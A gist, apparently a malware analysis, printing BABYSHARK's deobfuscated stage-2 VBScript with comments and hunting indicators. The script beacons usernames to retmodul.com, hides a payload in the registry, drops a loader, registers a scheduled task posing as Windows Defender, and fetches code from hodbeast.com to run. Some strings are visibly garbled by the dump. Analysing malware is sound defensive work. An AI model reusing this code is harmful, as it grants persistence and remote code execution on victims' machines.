@JohnHammond
Last active February 21, 2022 22:56
BABYSHARK malware stage2 -- deobfuscated data from the normal.crp file
' Analyst annotation of the deobfuscated stage-2 script. Comments describe only
' what the visible code does; values that look spaced-out or mismatched below
' are most likely artifacts of the deobfuscation dump, not of the original sample.
'
' Overview of the visible behaviour:
'   1. Gate on the local username; anything other than "bob"/"administrator"
'      only sends a beacon to retmodul.com and exits.
'   2. First run (no %appdata%\filexx.tmp): plant a VBScript payload as a
'      REG_SZ value under HKCU\Software\RegisteredApplications, drop a small
'      loader at %userprofile%\Microsoft\sys1.vbs, beacon, exit.
'   3. Second run (no %appdata%\schedxx.tmp): register a scheduled task that
'      runs the loader every 61 minutes with an argument that reads and
'      Execute()s the registry value, beacon, exit.
'   4. Later runs: beacon only.
'
' Detection / hunting points present on this page: the registry value name
' AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4g, the task name
' "Diagnosis\Windows Defender\Microsoft-Windows-Defender", the marker files
' filexx.tmp / schedxx.tmp / desktop.tmp under %appdata%, the dropped
' %userprofile%\Microsoft\sys1.vbs, and HTTP GETs to retmodul.com and hodbeast.com.

' Suppress all runtime errors so a failed step does not stop execution.
On Error Resume Next
Set fs = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
' msxml2.xmlhttp is the HTTP client used for every beacon below.
Set p0 = CreateObject("msxml2.xmlhttp")
scriptdir = ws.ExpandEnvironmentStrings("%appdata%")
userdir = ws.ExpandEnvironmentStrings("%userprofile%")
username = LCase(ws.ExpandEnvironmentStrings("%username%"))
' URL-escape the username, then strip the "%u" (Unicode) and "%20" (space)
' sequences Escape() can produce, so the value is safe to append to a query string.
username = Escape(username)
username = Replace(username,"%u","")
username = Replace(username,"%20","")
' chk is the stage marker sent with the final beacon: "no", "file" or "schedxx".
chk = "no"
username = LCase(username)
' Username gate: any host whose user is not one of the two names below gets a
' single beacon (op=<username>) and the script exits. The literal names here
' may have been substituted when the sample was deobfuscated - confirm against
' the original normal.crp data before treating them as the real targeting list.
If username <> "bob" And username <> "administrator" Then
p0.open "GET", "https://retmodul.com/google/goog.php?op=" + username,False
p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
p0.Send
WScript.quit
End If
' username0 is substituted into the embedded payload's URL; depth is the
' column count used by the payload's de-transposition loop.
If username = "bob" Then
username0 = "bob"
depth = "9"
End If
If username = "administrator" Then
username0 = "administrator"
depth = "9"
End If
' Stage 1 - runs only when the first-run marker %appdata%\filexx.tmp is absent.
' asd is a single "reg add" command line whose /d data is a complete VBScript
' (lines between this assignment and the closing "" / f"). Embedded newlines
' and the runs of doubled quotes are how the dump renders the quoted payload.
' The embedded script, as visible here: if %appdata%\desktop.tmp exists and is
' at least 10 bytes, it reads the file, reorders the characters by reading
' every d-th character starting at offsets 0..d-1 (a simple transposition
' decode), deletes the file and Execute()s the result; if the file is absent
' it fetches hodbeast.com/silver/expres.php?op=<username0> and writes the
' response to desktop.tmp for the next run. The URL and file paths appear with
' extra spaces in this dump (e.g. "https / / hodbeast.com") - treat as rendering
' artifacts, not as the literal strings written to the registry.
If Not fs.FileExists(scriptdir + "\filexx.tmp") Then
asd = "reg add HKEY_CURRENT_USER\Software\RegisteredApplications /v AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4g /t reg_sz /d ""Set Post0 = CreateObject(""""""msxml2.xmlhttp"""""")
Set objFSO = CreateObject(""""""Scripting.FileSystemObject"""""")
Set wShell = CreateObject(""""""WScript.Shell"""""")
folder = wShell.ExpandEnvironmentStrings(""""""""%""appdata""%"""""""")
data = """"""no""""""
If objFSO.FileExists(folder + """""" \ desktop.tmp"""""") Then
Set objFile = objFSO.GetFile(folder + """""" \ desktop.tmp"""""")
If objFile.Size < 10 Then
objFSO.DeleteFile folder + """""" \ desktop.tmp""""""
WScript.quit
End If
Set f = objFSO.OpenTextFile(folder + """""" \ desktop.tmp"""""", 1, True)
data = f.ReadAll
f.Close
d = ______d_____ _
L = Len(data)
s = """"""""""""
For jx = 0 To d - 1
For ix = 0 To Int(L / d) - 1
s = s & Mid(data,ix * d + jx + 1,1)
Next
Next
s = s & Right(data,L - Int(L / d) * d)
data = s
objFSO.DeleteFile folder + """""" \ desktop.tmp""""""
Else
Post0.open """"""Get"""""", """"""https / / hodbeast.com / silver / expres.php?op = username0"""""",False
Post0.setRequestHeader """"""Content - Type"""""", """"""application / x - www - form - urlencoded""""""
Post0.Send
t0 = Post0.responseText
Set f = objFSO.CreateTextFile(folder + """""" \ desktop.tmp"""""", True)
f.Write(t0)
f.Close
End If
If data <> """"""no"""""" Then
Execute(data)
End If
"" / f"
' Fill in the two placeholders inside the embedded payload. NOTE(review): the
' placeholder as printed in the payload above ("______d_____ _") does not match
' the Replace() target "______d______" character for character; this is most
' likely a transcription artifact of the dump - verify against the original.
asd = Replace(asd,"username0",username0)
asd = Replace(asd,"______d______",depth)
' Run the reg add with a hidden window (0) and wait for it to finish (True).
re = ws.run(asd, 0, True)
' Drop the loader %userprofile%\Microsoft\sys1.vbs. It takes its first
' command-line argument, turns every "z" into a double quote, and Execute()s
' the result - i.e. it runs whatever VBScript it is passed, with "z" standing
' in for quotes so the code can travel inside a single quoted argument.
fs.CreateFolder userdir + "\Microsoft"
Set objBat = fs.CreateTextFile(userdir + "\Microsoft\sys1.vbs",True)
objBat.Write "On Error Resume Next
"+vbcrlf+"Set oFilesToEncode = WScript.Arguments "+vbcrlf+"file = oFilesToEncode(0)"+vbcrlf+"file = Replace(file, ""z"", """""""")"+vbcrlf+"execute(file)"
objBat.Close
' Write the first-run marker (content "111") and beacon op=file<username>.
chk = "file"
Set hnd = fs.CreateTextFile(scriptdir + "\filexx.tmp", True)
hnd.Write "111"
hnd.Close
p0.open "GET", "https://retmodul.com/google/goog.php?op=" + chk + username,False
p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
p0.Send
WScript.quit
End If
' Stage 2 - runs only when the second marker %appdata%\schedxx.tmp is absent.
' Creates the marker, then a scheduled task that every 61 minutes runs
' wscript.exe /b on the loader dropped above, passing it a script (quotes
' encoded as "z") that RegReads the HKCU\...\RegisteredApplications value
' planted in stage 1 and Execute()s it. The task name mimics a Windows
' Defender diagnostic path. As with the payload above, the spaced-out
' "/ sc Minute / mo 61 / f" is how the dump renders "/sc Minute /mo 61 /f".
If Not fs.FileExists(scriptdir + "\schedxx.tmp") Then
chk = "schedxx"
Set hnd = fs.CreateTextFile(scriptdir + "\" + chk + ".tmp", True)
hnd.Write "111"
hnd.Close
tmp = "cmd.exe /c schtasks /create /tn ""Diagnosis\Windows Defender\Microsoft-Windows-Defender"" /tr ""wscript.exe /b """"""%userprofile%\Microsoft\sys1.vbs"""""" """"""On Error Resume Next
Set d = CreateObject(zWScript.Shellz)
e = d.RegRead(zHKEY_CURRENT_USER \ Software \ RegisteredApplications \ AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4gz)
execute(e)"""""""" / sc Minute / mo 61 / f"
' Hidden window, wait for schtasks to return, then beacon op=schedxx<username>.
re = ws.run(tmp, 0, True)
p0.open "GET", "https://retmodul.com/google/goog.php?op=" + chk + username,False
p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
p0.Send
WScript.quit
End If
' Every later run: both markers exist, so only this beacon is sent
' (chk is still "no" here, giving op=no<username>).
p0.open "GET", "https://retmodul.com/google/goog.php?op=" + chk + username,False
p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
p0.Send